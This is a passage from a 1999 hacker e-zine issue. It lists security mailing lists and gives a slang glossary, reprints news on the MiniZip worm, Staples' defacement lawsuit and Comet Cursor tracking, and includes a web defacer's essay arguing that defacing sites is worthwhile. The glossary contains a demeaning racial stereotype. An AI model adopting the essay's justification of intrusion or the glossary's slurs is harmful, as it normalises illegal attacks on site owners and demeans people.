disclosure has made a significant impact on the industry over the last half decade. * Products. An incredible number of categorized security products from over two hundred different vendors. * Services. A large and focused directory of security services offered by vendors. * Books, Papers and Articles. A vast number of categorized security related books, papers and articles. Available to download directly for our servers when possible. * Tools. A large array of free security tools. Categorized and available for download. * News: A vast number of security news articles going all the way back to 1995. * Security Resources: A directory to other security resources on the net. As well as many other things such as an event calendar. For your convenience the home-page can be personalized to display only information you may be interested in. You can filter by categories, keywords and operating systems, as well as configure how much data to display. I'd like to thank the fine folks at NETSPACE for hosting the site for as long as they have. Their services have been invaluable. I hope you find these changes for the best and the new services useful. I invite you to visit http://www.securityfocus.com/ and check it out for yourself. If you have any comments or suggestions please feel free to contact me at this address or at aleph1@securityfocus.com. Cheers. -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --[ New ISN announcement (New!!) Sender: ISN Mailing List From: mea culpa Subject: Where has ISN been? Comments: To: InfoSec News To: ISN@SECURITYFOCUS.COM It all starts long ago, on a network far away.. Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occured, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe. As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. THey are providing the bandwidth, machine, and listserv that runs the list now. Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn". As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;) mea_culpa www.attrition.org --[ Old ISN welcome message [Last updated on: Mon Nov 04 0:11:23 1998] InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more. The subject line will always contain the title of the article, so that you may quickly and effeciently filter past the articles of no interest. This list will contain: o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more. o Information on where to obtain articles in current magazines. o Security Book reviews and information. o Security conference/seminar information. o New security product information. o And anything else that comes to mind.. Feedback is encouraged. The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list. Please do NOT: * subscribe vanity mail forwards to this list * subscribe from 'free' mail addresses (ie: juno, hotmail) * enable vacation messages while subscribed to mail lists * subscribe from any account with a small quota All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s). Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributers. ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn ISN Archive: http://www.landfield.com/isn ISN Archive: http://www.jammed.com/Lists/ISN/ ISN is Moderated by 'mea_culpa' . ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion. The ISN membership list is NOT available for sale or disclosure. ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs. Win2k Security Advice Mailing List (new added Nov 30th) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To subscribe: send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body to listserv@listserv.ntsecurity.net Welcome to Win2K Security Advice! Thank you for subscribing. If you have any questions or comments about the list please feel free to contact the list moderator, Steve Manzuik, at steve@win2ksecadvice.net. To see what you've missed recently on the list, or to research an item of interest, be sure to visit the Web-based archives located at: http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec ============== NTSecurity.net brings the security community a brand new (Oct 99) and much-requested Windows security mailing list. This new moderated mailing list, Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open discussion of Windows-related security issues. With a firm and unwavering commitment towards timely full disclosure, this new resource promises to become a great forum for open discussion regarding security-related bugs, vulnerabilities, potential exploits, virus, worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community and we openly invite all security minded individuals, be they white hat, gray hat, or black hat, to join the new mailing list. While Win2KSecAdvice was named in the spirit of Microsoft's impending product line name change, and meant to reflect the list's security focus both now and in the long run, it is by no means limited to security topics centered around Windows 2000. Any security issues that pertain to Windows-based networking are relevant for discussion, including all Windows operating systems, MS Office, MS BackOffice, and all related third party applications and hardware. The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to a security risk, it's relevant to the list. The list archives are available on the Web at http://www.ntsecurity.net, which include a List Charter and FAQ, as well as Web-based searchable list archives for your research endeavors. SAVE THIS INFO FOR YOUR REFERENCE: To post to the list simply send your email to win2ksecadvice@listserv.ntsecurity.net To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to listserv@listserv.ntsecurity.net Regards, Steve Manzuik, List Moderator Win2K Security Advice steve@win2ksecadvice.net @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ __ ___ ___ \ \ / / |__ ___ __ _ _ __ _____ ____|__ \ \ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ / \ V V / | | | | (_) | (_| | | | __/\ V V / __/_| \_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_) Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/programming/IRC+ man in black sas2@usa.net .............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black twisted-pair@home.com......: currently active/programming/IRC+ Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sla5h.............................: Croatia N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Wyze1.............................: South Africa Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) Sla5h's email: smuddo@yahoo.com ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ ___ ___ _____ _ ___ | | | \ \ / / \ | ___/ \ / _ \ | |_| |\ \ /\ / / _ \ | |_ / _ \| | | | | _ | \ V V / ___ \ _| _/ ___ \ |_| | |_| |_| \_/\_/_/ \_(_)_|/_/ \_\__\_\ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ / ___|_ __ ___ ___| |_ ___ | | _| '__/ _ \/ _ \ __/ __| | |_| | | | __/ __/ |_\__ \ \____|_| \___|\___|\__|___/ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi _Jeezus_ Haze_ thedeuce ytcracker Folks from #hwa.hax0r,news and #fawkerz, #ninjachat and #sesame Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick kewl sites: + http://www.hack.co.za NEW + http://blacksun.box.sk. NEW + http://packetstorm.securify.com/ NEW + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up... ============================================================================== 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * Short issue this week, i'm still sick * so haven't put as much time as I usually do * into digging up info and etc, hopefully be * back to normal next week... * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. -= start =--= start =--= start =--= start =--= start =--= start =--= start ____ _ _ / ___|___ _ __ | |_ ___ _ __ | |_ | | / _ \| '_ \| __/ _ \ '_ \| __| | |__| (_) | | | | || __/ | | | |_ \____\___/|_| |_|\__\___|_| |_|\__| / ___|| |_ __ _ _ __| |_ \___ \| __/ _` | '__| __| ___) | || (_| | | | |_ |____/ \__\__,_|_| \__| -= start =--= start =--= start =--= start =--= start =--= start =--= 03.0 Yes It Is (Worth It) ~~~~~~~~~~~~~~~~~~~~ contributed by ytcracker Active web page defacer YTCracker has written an article in response to Brian Martin's article Is It Worth IT, published by HNN last week. Mr Martin asked if the recent spate of web page defacements was worth the trouble it causes the perpetrators. YTCracker has recently defaced such high profile pages as Bureau of Land Management National Training Center and the Defense Contracts Audit Agency. YTCracker now explains the motivation and says that, Yes, it is worth it. Buffer Overflow http://www.hackernews.com/orig/buffero.html HNN Cracked Pages Archive - Some of YTCrackers work is displayed here. http://www.hackernews.com/archive/crackarch.html "Yes, it is." A response to Brian Martin's Is it worth it? article. By YTCracker (phed@felons.org) This article was written in response to an article written by Brian Martin concerning web page defacement, its risks, and its consequences. He asks the eternal question "Is it worth it?" to those who participate in these kinds of activities. Many of the individuals I have talked to have mixed thoughts about the article. Some individuals say it really taught them something valuable. Some said it scared them into considering quitting. Others, including myself, carry a somewhat apathetic attitude toward the whole thing in general. Allow me to explain. A few things need to be established about this defacement culture. One, I believe that this in no way constitutes as hacking. On any level, no matter how you look at it, web page defacement is destructive. In some cases, it can ruin the credibility of a company or a government agency. Two, I believe that web page defacement should carry a "message". When I spoke with Brian earlier, I tried to make it clear that we [as third person onlookers to a defacement] cannot determine this message in some cases. To us, "hack0r x 0ens u in 9d9" probably means nothing at all. To hack0r x, it may have. However, I personally believe that if hack0r x is going to break into this page and disrupt their message, his better be worthwhile. Thirdly, I believe that there is a "whiter" side to defacement. This side operates within definitive ethical boundaries and attempts to make web page cracking as non-malicious as possible. I do my best to have the ability to define myself under this ethical side. I back everything up. I leave the administrator information on how to fix the security hole. I don't disrupt the flow of information - I leave a link to the original page in plain sight. While these factors don't guarantee my immunity, they surely aren't raising any eyebrows and leading people to contemplate my threat to national security. I am not concerned with leaving messages like "fuq da fedz in 9d9 suk0r my nutsaq." That, frankly, is asking for trouble. It also serves no purpose. Why do I do it? There are a few key reasons. I am sure that everyone out there that contributes to this scene has their own. First off, I am seventeen [before I go any further, I am referring to seventeen as "kid", not "a minor and therefore will receive lesser penalty"]. As a young member of society oftentimes I find that my voice goes unheard. In a book titled Rise and Fall of the American Teen by Thomas Hine [NPR broadcast] , the theory is presented that the proverbial "teenager" did not exist until the 1930s. Until that time, teenagers were too busy supporting the family, getting married, and having children. Nowadays, if I were to write my senator, correct my teacher, or start a business, people automatically assume that I am incapable. This is a stereotype that I have not established for myself; other teenagers have given me a reputation unbefitting of who I really am. By defacing a website, people have to listen. The volume of people that visit the site as it is defaced combined with the volume of people that view it mirrored is immense. Therefore, I have effectively gotten my message out, and people can choose to listen to it or not. If this sounds extremely selfish, I agree. The twist comes in the questions that people ask themselves. For instance, one of my motivations is enlightening system administrators. There has been many a case where I have noticed a vulnerablilty, mailed the admin, and his/her cockyness resulted in ignoring my warning. Two or three days later, I see this admin's page on the mirror. Sometimes, the best way to inform someone is to show them. Seeing is believing. The point is, if I can get at least one of the hundred people that see that site, including the administrator, to realize that security isn't all its cracked up to be and change their views, I have done my job. This line of thought is very common in the heads of most defacement practitioners. Second, I am a graffiti artist. I throw burners on walls and trains. I have ran with some infamous crews. I do not represent the "tagging" aspect [for the uninitiated, the equivalent of "b0n3r oenz u" on a defacement]. I strongly feel that graffiti can be very artistic and carry a very strong message if done correctly. People will pass by your piece and either love it or hate it. For that moment they take their mind off of their jobs, their children, their lives and they contemplate what they are looking at. This is very much so the purpose of web defacement in my eyes. Third, I don't care. I can't care. I haven't been raided, haven't stared down a lawman's gun, and haven't been investigated for computer crime. If any of these were to happen to me, I have no doubt in my mind I will see things in a different light. This ignorance is obviously not very healthy. I have weighed the consequences and see very little in favor of me stopping. I will most likely continue to deface until it gets old, I have nothing else to say, or simply don't have time. I would argue that ninety percent of web page defacements fall under this mindset. This is sad, but true. This is not to say that I or anyone else isn't aware of the rules. That assumption is far from the truth. What it means is that we are basically carefree in the sense that we could be arrested and still feel good about ourselves. ;) In a sense, it isn't worth it. There are only a few of us singlehandedly cracking with good intentions. The rest of the scene is too busy talking shit to each other or rm -rfing everything they can that there is a stereotype affiliated. As aforementioned, stereotypes are the ultimate backpedal to anything we accomplish. Just as teenagers are ignored and pigeonholed, everyone who totes a computer and investigates security will be labeled a threat. What does make it worth it? Arguably, the few who carry on the tradition. PHC and Narcissus - using their defacements as a political tool. DHC - putting an interesting poetic twist to their cracks. ULG - for making BIG statements on BIG sites. Last but not least, v00d00 - for his cynical views and unique style. There are others, no doubt, but these guys definately take the cake for originality and style - they have my respect. So next time you see my name or anyone else's pop up on attrition and wonder why we do it, think back to this article. Is it worth it? You decide. YTCracker(phed@felons.org) (c)1999 YTCracker andseven one nine @HWA 04.0 ExplorerZip Shrinks, Becomes MiniZip ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench By applying a simple compression scheme (Neolite) to the well known destructive virus WormExplorer it is possible to sneak the old worm by antivirus software. This 'new' version of WormExplorer is being called MiniZip. The worm uses MAPI-capable e-mail programs to propagate, such as Microsoft Corp.'s Outlook, Microsoft Corp.'s Outlook Express and Microsoft Corp.'s Exchange. At least twenty companies and several thousand systems have been infected so far. (It is pretty sad that with todays technology a simple compression routine is enough to bypass antivirus technology. Pattern detection is not the answer. Sure hope the AV companies have something better up their sleeves.) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2402114,00.html?chkpt=zdnntop MSNBC http://www.msnbc.com/news/341096.asp Associated Press - via Baltimore Sun http://www.sunspot.net/cgi-bin/gx.cgi/AppLogic+FTContentServer?section=cover&pagename=story&storyid=1150180206405 MiniZip a nasty, small clone of ExploreZip New virus compresses ExploreZip code to evade anti-virus software, bites at least a dozen companies. By Jim Kerstetter, PC Week UPDATED December 1, 1999 9:04 AM PT They call it, MiniZip. Virus researchers at Network Associates Inc. (Nasdaq: NETA), Symantec Corp. (Nasdaq: SYMC) and Trend Micro Inc. warned Tuesday evening that a new version of the ExploreZip virus, which wipes out information on a hard drive, has hit at least 12 companies so far, six of them high-tech manufacturing companies. Several thousand PCs are believed to have been hit. The ExploreZip variant, also called ExploreZip.worm.pak, is 120KB, about half the size of its predecessor. But other than its diminutive size, MiniZip acts exactly like ExploreZip, which wipes out files on hard drives and can spread via e-mail. Compression conundrum MiniZip is so small because the virus's author compressed the original ExploreZip code. Compressing it changes the bits, meaning that anti-virus software has trouble identifying the new virus. MiniZip first appeared last week, so most anti-virus makers have updated their software to detect its code. While anti-virus makers issued notice of the new updates, it appears that many companies have not updated their anti-virus software, allowing Tuesday's outbreak. What to look for ExploreZip, the "father" of MiniZip, was first reported on June 11. To propagate, the worm uses MAPI-capable e-mail programs, such as Microsoft Corp.'s Outlook, Outlook Express and Exchange. It e-mails itself out as an attachment with the filename "zipped_files.exe." The body of the e-mail message looks like it came from a regular e-mail correspondent and says: "I received your email and I shall send you a reply ASAP. Till then, take a look at the attached zipped docs." Once it's launched, MiniZip launches the original Worm.ExploreZip routine. It looks for any drives mapped to the infected computer and spreads to them. It also looks for unread e-mail and automatically replies to them, in search of new victims. "That's why it has spread so rapidly now, but didn't at first," said Vincent Weafer, director of the Symantec Antivirus Research Center. "This is exactly how ExploreZip spread." MiniZip may display an error message informing the user that the file is not a valid archive, according to the anti-virus companies. The worm copies itself to the c:\windows\system directory with the file name "Explore.exe" and then modifies the WIN.INI file so that the virus launches each time Windows is started. Associated Press; Computer virus devouring files The Associated Press SAN FRANCISCO (AP) — Experts scrambled to warn thousands of computer users that a familiar and damaging virus has struck scores of companies and could be slumbering in their e-mail inboxes. The Mini-Zip virus tore through computers on Tuesday, devouring files and crippling e-mail systems, anti-virus analysts said. It was expected to renew its assault today as unsuspecting users logged on. Dan Schrader, vice president of new technology at Trend Micro in Cupertino, Calif., said he fielded complaints of significant problems from four Fortune 500 companies and scores of smaller companies. Sal Viveros, a marketing manager for Santa Clara-based Network Associates, which makes anti-virus software, said 20 large corporations had been affected by Tuesday evening. The experts refused to release the names of affected companies. Mini-Zip's parent bug, Worm.Explore.Zip, struck last summer. It was considered the most destructive virus since the Melissa outbreak in the spring. ``The last time this virus came along it affected tens of thousands — maybe hundreds of thousands of computers — and caused millions of dollars in damage,'' Schrader said. ``It's malicious and fast-spreading. We consider this to be high-risk.'' It wasn't clear whether the problem had been reported to the government-chartered CERT Coordination Center — formerly the Computer Emergency Response Team — at Carnegie Mellon University in Pittsburgh. There were no warnings on its Web site early today. Anti-virus experts said the bug gets loose from an infected system as a seemingly friendly reply to a clean e-mail sent via the Microsoft Outlook, Outlook Express or Exchange browsers. The virus intercepts the original message and automatically sends itself as a response — even changing the subject line from, for example, ``Work Meeting'' to ``Re: Work Meeting.'' The body of the message reads: ``Hi (recipient's name)! I received your e-mail and I shall send you an e-mail ASAP. Till then, take a look at the attached zipped docs. bye.'' The e-mail contains an attachment called ``zipped—files.exe.'' If a user double-clicks on the attachment, the virus is set loose in the new victim's system. It then destroys a series of files in a computer's hard drive by replacing them with empty files. Anti-virus experts cautioned users against opening e-mails if they do not know the sender or why they were sent. They said the virus could be fought with updated anti-virus software. Originally published on 12/01/1999 @HWA 05.0 Staples Files Suit Against Unknown Defacer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Staples Inc. has filed a lawsuit in US District Court in Boston charging that "John Doe," an unidentified cyber intruder, illegally accessed the company's Web site and damaged the company by stealing e-commerce business. The defacement that occurred on October 9th, featured advertisements for products at Home Depot. Staples hope to identify the intruder shortly. (How do you sue an unknown person?) Boston Globe http://www.globe.com/dailyglobe2/334/business/Staples_files_suit_against_Web_hacker+.shtml Associated Press http://library.northernlight.com/EB19991130960000057.html?cb=0&dx=1006&sc=0#doc Staples files suit against Web hacker By Shelley Murphy, Globe Staff, 11/30/99 hopping on line may be the best way to avoid holiday crowds, but customers visiting Staples's Web site one day last month encountered a unique problem when they unwittingly found themselves in a competitor's store. A hacker broke into the Framingham office-supply retailer's Internet site, www.staples.com, on Oct. 9 and posted advertisements for one of the company's major competitors, Office Depot. Shoppers clicking on Office Depot products were linked immediately to the home page of Staples's major competitor, which is based in Delray Beach, Fla. Officials at Staples Inc. filed a lawsuit in US District Court in Boston yesterday charging that ''John Doe,'' the unidentified hacker, illegally accessed the company's Web site and damaged the company by stealing e-commerce business. The suit contends that the hacker is believed to live in or near Massachusetts and that the company expects to identify him shortly. ''We consider it highly unlikely that...our competitors were involved in any way,'' said Shannon Lapierre, public relations manager of Staples, speculating that the changes to the Web site may have been a prank. But Staples, which just announced third-quarter Internet sales revenue of $24 million, is taking the Web-site intrusion seriously and is determined to identify the culprit and report him to federal authorities, Lapierre said. Meanwhile, federal authorities have been on the lookout for Internet fraud. Federal law prohibits unauthorized access to a computer and calls for as much as 10 years in prison if damage is caused recklessly as a result of the breach. ''Obviously e-commerce is a very important part of our business and very important to the company,'' said Lapierre. Staples's goal is to have 1 million on-line customers and $1 billion in Internet sales by 2003, Lapierre said. Staples, which did $7 billion in sales last year and which operates more than 1,000 office superstores, launched its Web site a year ago. While monitoring the site Oct. 9, officials noticed that products advertised throughout the Web site had been deleted and replaced with products bearing the Office Depot logo. The suit said that the Office Depot advertisements contained links to the Florida company's Web site, meaning that Staples's shoppers who clicked on the illegally advertised products were redirected to the competitor's Web site. Shoppers were diverted from Staples to Office Depot for about an hour before the problem was corrected, Lapierre said. In addition to lost business, Staples alleges that it cost the company time and money to repair its Web site and to determine the extent of the security breach. Calls to Office Depot, the world's largest seller of office products, were referred to the company's vice president of public relations, who couldn't be reached for comment late yesterday. Lapierre said the problems created by the hacker had never happened to Staples before. ''It's an interesting time we live in,'' she said. Staples's stock rose yesterday to close at 23-13/16 in trading on the Nasdaq market. Office Depot closed at 11 1/2, down , on the New York Stock Exchange. This story ran on page D01 of the Boston Globe on 11/30/99. © Copyright 1999 Globe Newspaper Company. Associated Press; Story Filed: Tuesday, November 30, 1999 12:50 PM EDT BOSTON (AP) -- Office supply store Staples has filed suit against an unnamed hacker who broke into its Internet site and posted advertisements that led Web browsers to the home page of one of its chief competitors. In the suit filed Monday in U.S. District Court in Boston, Framingham-based Staples charged that the hacker, referred to as ``John Doe,'' illegally entered the site and damaged Staples by stealing e-commerce business. The suit claims that ``John Doe'' lives in or near Massachusetts, and that the company expects to identify him shortly. The hacker broke into the Staples Internet site on Oct. 9 and posted advertisements for Office Depot. Shoppers who clicked on the Office Depot products were linked to the Office Depot home page. The problem was corrected after about an hour. In the suit, Staples alleges that, aside from a loss of money, it cost time and money to find and fix the security breach. Staples officials speculated that changes to the Web page were a prank, and discounted the possibility that its competitors were behind it. Gary Schweikhart, an Office Depot spokesman, said Tuesday the company was outraged by the computer hack and said Office Depot had no part in it. ``We're not that dumb and at the same time we would not condone any activity that is illegal and unethical,'' he said. Federal law calls for a maximum of 10 years in prison if damage is caused as a result of unauthorized access to a computer. Staples, which did $7 billion in sales last year, launched its Web site a year ago. The company hopes to have 1 million Internet customers and $1 billion in Internet sales by 2003, Lapierre said. Copyright © 1999 Associated Press Information Services, all rights reserved. @HWA 06.0 Comet bows to consumer pressure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Ted Yesterday Comet Systems Inc. was accused of collecting data on consumers web surfing practices with their free cursor changing software. The software Comet Cursor, is installed on over 16 million systems and tracks web usage of over 60,000 web sites. Following rampant consumer outcry over the practice Comet Systems has agreed to allow consumers to delete the serial number used to 